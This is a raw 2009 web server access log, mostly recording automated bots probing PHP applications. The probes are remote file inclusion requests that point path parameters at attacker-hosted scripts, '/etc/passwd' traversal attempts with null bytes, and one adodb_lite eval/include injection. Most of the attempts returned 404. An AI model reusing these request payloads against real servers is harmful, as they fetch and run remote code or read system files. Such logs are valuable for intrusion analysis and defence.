85.233.195.15 - - [10/Apr/2009:00:16:48 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/peruzaklaknat/idv6.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
66.90.118.42 - - [10/Apr/2009:00:21:29 -0500] "GET /logs//add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.810"
66.90.118.42 - - [10/Apr/2009:00:21:29 -0500] "GET //add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.810"
77.221.130.12 - - [10/Apr/2009:00:22:41 -0500] "GET /logs//add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.221.130.12 - - [10/Apr/2009:00:22:41 -0500] "GET //add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
77.120.105.62 - - [10/Apr/2009:00:23:43 -0500] "GET /logs//includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:23:43 -0500] "GET /logs/access_log.1233273600//includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:23:46 -0500] "GET //includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:24:50 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:24:56 -0500] "GET //includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:24:56 -0500] "GET /logs/access_log.1234656000//includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:24:59 -0500] "GET /logs//includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:25:03 -0500] "GET /logs/access_log.1233273600//includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:25:03 -0500] "GET /logs//includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.120.105.62 - - [10/Apr/2009:00:25:06 -0500] "GET //includes/class_item.php?fileExtension=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.233.195.15 - - [10/Apr/2009:00:28:27 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/peruzaklaknat/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.233.195.15 - - [10/Apr/2009:00:28:27 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/peruzaklaknat/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.233.195.15 - - [10/Apr/2009:00:28:27 -0500] "GET /logs/access_log.1236729600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/peruzaklaknat/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
85.233.195.15 - - [10/Apr/2009:00:28:43 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/peruzaklaknat/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
89.187.131.186 - - [10/Apr/2009:00:34:04 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.187.131.186 - - [10/Apr/2009:00:34:04 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.187.131.186 - - [10/Apr/2009:00:34:05 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:00:41:03 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:00:41:03 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:00:41:03 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:00:41:05 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
58.226.94.122 - - [10/Apr/2009:00:47:26 -0500] "GET /logs/access_log.1232064000/?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.226.94.122 - - [10/Apr/2009:00:47:26 -0500] "GET /logs/access_log.1230422400/?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.226.94.122 - - [10/Apr/2009:00:47:26 -0500] "GET /?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.226.94.122 - - [10/Apr/2009:00:47:28 -0500] "GET /logs/?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt??? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
202.53.250.25 - - [10/Apr/2009:00:51:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
202.53.250.25 - - [10/Apr/2009:00:51:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
121.14.37.144 - - [10/Apr/2009:00:55:33 -0500] "GET /logs//include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.14.37.144 - - [10/Apr/2009:00:55:33 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.14.37.144 - - [10/Apr/2009:00:55:33 -0500] "GET //include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.14.37.144 - - [10/Apr/2009:00:55:49 -0500] "GET //include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.14.37.144 - - [10/Apr/2009:00:55:49 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.14.37.144 - - [10/Apr/2009:00:55:49 -0500] "GET /logs//include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.14.37.144 - - [10/Apr/2009:00:55:54 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.14.37.144 - - [10/Apr/2009:00:56:00 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.230.213.52 - - [10/Apr/2009:01:17:51 -0500] "GET /logs/access_log.1234224000//ncaster/admin/addons/archive/archive.php?adminfolder=http://users4.nofeehost.com/anjrit/fx/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.230.213.52 - - [10/Apr/2009:01:17:51 -0500] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=http://users4.nofeehost.com/anjrit/fx/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.230.213.52 - - [10/Apr/2009:01:17:51 -0500] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://users4.nofeehost.com/anjrit/fx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.230.213.52 - - [10/Apr/2009:01:18:14 -0500] "GET /logs/access_log.1235779200//ncaster/admin/addons/archive/archive.php?adminfolder=http://users4.nofeehost.com/anjrit/fx/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.213.245.215 - - [10/Apr/2009:01:22:16 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://207.213.245.215/LASA/modules2/.dat/copyright.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
89.186.1.54 - - [10/Apr/2009:01:26:18 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?vwar_root=http://www.pupapa.com/shop/images/fix/spider.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.800"
89.186.1.54 - - [10/Apr/2009:01:26:18 -0500] "GET //modules/vwar/convert/mvcw_conver.php?vwar_root=http://www.pupapa.com/shop/images/fix/spider.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.800"
207.213.245.215 - - [10/Apr/2009:01:28:39 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://207.213.245.215/LASA/modules2/.dat/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
83.16.182.130 - - [10/Apr/2009:01:41:36 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
83.16.182.130 - - [10/Apr/2009:01:41:37 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
89.187.131.186 - - [10/Apr/2009:01:48:36 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.187.131.186 - - [10/Apr/2009:01:48:36 -0500] "GET /logs/access_log.1236729600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
89.187.131.186 - - [10/Apr/2009:01:48:36 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
58.225.75.222 - - [10/Apr/2009:01:52:03 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://southsiderotary.com/fx29id.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.225.75.222 - - [10/Apr/2009:01:52:03 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://southsiderotary.com/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.225.75.222 - - [10/Apr/2009:01:52:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://southsiderotary.com/fx29id.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.225.75.222 - - [10/Apr/2009:01:53:19 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://southsiderotary.com/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.230.165 - - [10/Apr/2009:01:53:27 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 200 11256 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
74.94.66.42 - - [10/Apr/2009:01:53:44 -0500] "GET /logs/access_log.1238112000/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:53:44 -0500] "GET /logs/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:53:44 -0500] "GET /index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
150.164.106.1 - - [10/Apr/2009:01:54:25 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://thalesnn.justfree.com/roxlink/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
150.164.106.1 - - [10/Apr/2009:01:54:25 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://thalesnn.justfree.com/roxlink/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
150.164.106.1 - - [10/Apr/2009:01:54:25 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://thalesnn.justfree.com/roxlink/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:54:28 -0500] "GET /index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:54:28 -0500] "GET /logs/access_log.1238112000/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:54:28 -0500] "GET /logs/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:01:54:39 -0500] "GET /index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:01:54:39 -0500] "GET /logs/access_log.1238112000/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:01:54:39 -0500] "GET /logs/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:01:54:44 -0500] "GET /index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:01:54:44 -0500] "GET /logs/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:01:54:44 -0500] "GET /logs/access_log.1238112000/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:57:37 -0500] "GET /logs/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:57:37 -0500] "GET /logs/access_log.1238112000/index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:01:57:46 -0500] "GET /index.php?meio.php=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
82.94.179.41 - - [10/Apr/2009:01:58:15 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/4.0 (compatible; Vagabondo/4.0Beta; webcrawler at wise-guys dot nl; http://webagent.wise-guys.nl/)"
82.94.179.41 - - [10/Apr/2009:01:58:16 -0500] "GET /logs/access_log.1235347200 HTTP/1.0" 200 189189 "http://www.disaproducts.nl/search/scanhttp:-www.sexytranse.net-news-indc.txt/1-5.html""Mozilla/4.0 (compatible; Vagabondo/4.0Beta; webcrawler at wise-guys dot nl; http://webagent.wise-guys.nl/; http://www.wise-guys.nl/)"
203.151.233.216 - - [10/Apr/2009:02:07:39 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://thalesnn.justfree.com/roxlink/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
203.151.233.216 - - [10/Apr/2009:02:07:39 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://thalesnn.justfree.com/roxlink/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
203.151.233.216 - - [10/Apr/2009:02:07:39 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://thalesnn.justfree.com/roxlink/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.67.24.213 - - [10/Apr/2009:02:11:59 -0500] "GET /errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.24.213 - - [10/Apr/2009:02:11:59 -0500] "GET /logs/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.67.24.213 - - [10/Apr/2009:02:11:59 -0500] "GET /logs/access_log.1237852800/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.24.213 - - [10/Apr/2009:02:12:40 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.106.64.66 - - [10/Apr/2009:02:26:20 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.thecaptainscoffee.com/libraries/v4id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
87.106.64.66 - - [10/Apr/2009:02:26:21 -0500] "GET //ashnews.php?pathtoashnews=http://www.thecaptainscoffee.com/libraries/v4id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
119.147.24.160 - - [10/Apr/2009:02:28:27 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:28:27 -0500] "GET /logs/access_log.1236816000///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:28:27 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:28:45 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.115.64.106 - - [10/Apr/2009:02:38:22 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
207.115.64.106 - - [10/Apr/2009:02:38:22 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
119.147.24.160 - - [10/Apr/2009:02:38:22 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:38:22 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:38:24 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:38:38 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:39:02 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:39:02 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:39:02 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:39:02 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.208.141 - - [10/Apr/2009:02:41:06 -0500] "GET /logs/access_log.1195084800 HTTP/1.1" 200 18771 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [10/Apr/2009:02:41:06 -0500] "GET /logs/access_log.1132099200 HTTP/1.1" 200 1939 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.36.149.90 - - [10/Apr/2009:02:44:44 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:02:44:44 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:02:44:44 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:02:44:44 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:45:43 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:45:43 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:45:43 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:45:43 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:48 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:48 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:48 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:48 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:48 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:49 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:52 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:52 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:52 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:45:59 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:46:09 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.94.66.42 - - [10/Apr/2009:02:46:09 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:02:47:17 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:02:47:17 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:02:47:17 -0500] "GET /logs/access_log.1236902400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.36.149.90 - - [10/Apr/2009:02:47:17 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.84.128.40 - - [10/Apr/2009:02:49:28 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
88.84.128.40 - - [10/Apr/2009:02:49:28 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
65.55.208.141 - - [10/Apr/2009:02:51:29 -0500] "GET /logs/access_log.1135209600 HTTP/1.1" 200 1136 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
119.147.24.160 - - [10/Apr/2009:02:51:37 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.147.24.160 - - [10/Apr/2009:02:51:37 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
